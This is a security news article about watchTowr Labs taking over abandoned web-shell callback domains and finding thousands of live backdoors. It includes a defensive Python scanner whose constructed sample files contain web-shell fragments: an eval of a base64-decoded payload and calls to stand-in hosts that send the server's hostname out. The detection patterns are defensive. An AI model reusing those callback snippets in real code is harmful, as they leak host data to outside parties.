Backdoor in backdoors

13 January 2025 | 2 minutes | Author: Newsman

Researchers at watchTowr Labs discovered more than 4,000 active backdoors on compromised systems belonging to governments and universities around the world, by taking over the abandoned domains and infrastructure those backdoors relied on.

The watchTowr Labs team conducted extensive research into abandoned domains that backdoors on compromised systems had been built to contact. The idea was to take control of abandoned backdoors through which attackers had gained access to compromised systems. To do this, the researchers registered more than 40 abandoned domains that old web shells used to communicate with their operators.

After registering the domains and pointing them at their own servers, the researchers discovered more than 4,000 active backdoors on various systems, including:

  • Government institutions in China, Bangladesh and Nigeria
  • Universities of Thailand, South Korea and China

In addition, the team obtained data on the use of old, popular web shells such as r57shell and c99shell, which had built-in backdoors that let “hackers control hackers”. The identified backdoors made it possible to observe how attackers infected systems, and also to gain access to those systems with minimal effort.

A similar technique has been used before: the watchTowr team's research on domain swapping for .MOBI domains, which allowed them to obtain trusted TLS/SSL certificates, led to global changes in certificate-issuance practices initiated by Google.

Web shells such as r57shell and c99shell have historically been widely used by hackers and cybercriminals for follow-on attacks after an initial server breach. They often contained hidden backdoors that let the web shell's authors access compromised systems even when the original hacker had password-protected the shell.
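The practical lesson of the research described above is that a web shell left on a server is also a hardcoded link to whoever owns the domain it phones home to. The following script is an added example written for this article, not watchTowr's tooling or the source of any real web shell: it scans PHP files in a web root for the two features the text describes, obfuscated `eval()` payloads and hardcoded outbound callback hosts, so that a defender can find such files during an asset review and check who currently controls those domains. The sample files, their paths and the `*.example.invalid` hostnames are constructed for the example; the article does not name the domains the researchers registered.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Indicators typical of classic PHP web shells (r57/c99 family). These are
# generic patterns written for this example, not signatures of specific files.
SUSPICIOUS_PATTERNS = {
    "eval_of_decoded_payload": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I
    ),
}

# A shell that phones home embeds the destination as a string literal. When that
# host is abandoned, whoever registers it inherits the callback traffic.
CALLBACK_URL = re.compile(
    r"\b(?:file_get_contents|fopen|curl_init)\s*\(\s*['\"](?P<url>https?://[^'\"]+)['\"]", re.I
)
FSOCKOPEN_HOST = re.compile(r"\bfsockopen\s*\(\s*['\"](?P<host>[A-Za-z0-9.-]+)['\"]", re.I)

# Hosts that are not worth reviewing (the server talking to itself).
DEFAULT_IGNORE = frozenset({"localhost", "127.0.0.1"})


@dataclass
class Finding:
    path: str
    indicators: list = field(default_factory=list)
    callback_hosts: list = field(default_factory=list)

    def is_suspicious(self):
        return bool(self.indicators or self.callback_hosts)


def scan_php_source(path, src, ignore_hosts=DEFAULT_IGNORE):
    """Return a Finding for one PHP file's source text."""
    finding = Finding(path)
    finding.indicators = [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(src)]
    hosts = []
    for m in CALLBACK_URL.finditer(src):
        host = urlparse(m.group("url")).hostname
        if host and host not in ignore_hosts and host not in hosts:
            hosts.append(host)
    for m in FSOCKOPEN_HOST.finditer(src):
        host = m.group("host").lower()
        if host not in ignore_hosts and host not in hosts:
            hosts.append(host)
    finding.callback_hosts = hosts
    return finding


def triage(files):
    """files: mapping of path -> source text. Returns only suspicious findings."""
    return [f for f in (scan_php_source(p, s) for p, s in files.items()) if f.is_suspicious()]


def hosts_to_review(findings):
    """Distinct callback hosts; each should be checked for current ownership/registration."""
    return sorted({h for f in findings for h in f.callback_hosts})


# Constructed sample web root: one benign file and two planted files.
SAMPLE_FILES = {
    "webroot/index.php": "<?php echo 'hello'; ?>",
    "webroot/images/.cache.php": (
        "<?php\n"
        "eval(base64_decode('aGVsbG8='));\n"
        "@file_get_contents('http://callback.example.invalid/ping.php?h='.$_SERVER['HTTP_HOST']);\n"
        "?>"
    ),
    "webroot/uploads/theme.php": (
        "<?php\n$s = @fsockopen('beacon.example.invalid', 80, $errno, $errstr, 5);\n?>"
    ),
}

if __name__ == "__main__":
    results = triage(SAMPLE_FILES)
    for f in results:
        print(f"{f.path}: indicators={f.indicators} callbacks={f.callback_hosts}")
    print("hosts to review:", hosts_to_review(results))
```

Run against a real web root by replacing `SAMPLE_FILES` with a walk over `*.php` files; the registration check for each reported host is deliberately left to the reviewer, since a domain that has lapsed (or changed hands) is exactly the condition the article warns about.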

The watchTowr Labs study highlights the dangers of abandoned infrastructure and abandoned domains that can be used to control compromised systems. The company encourages organizations to regularly review their assets and ensure their security.
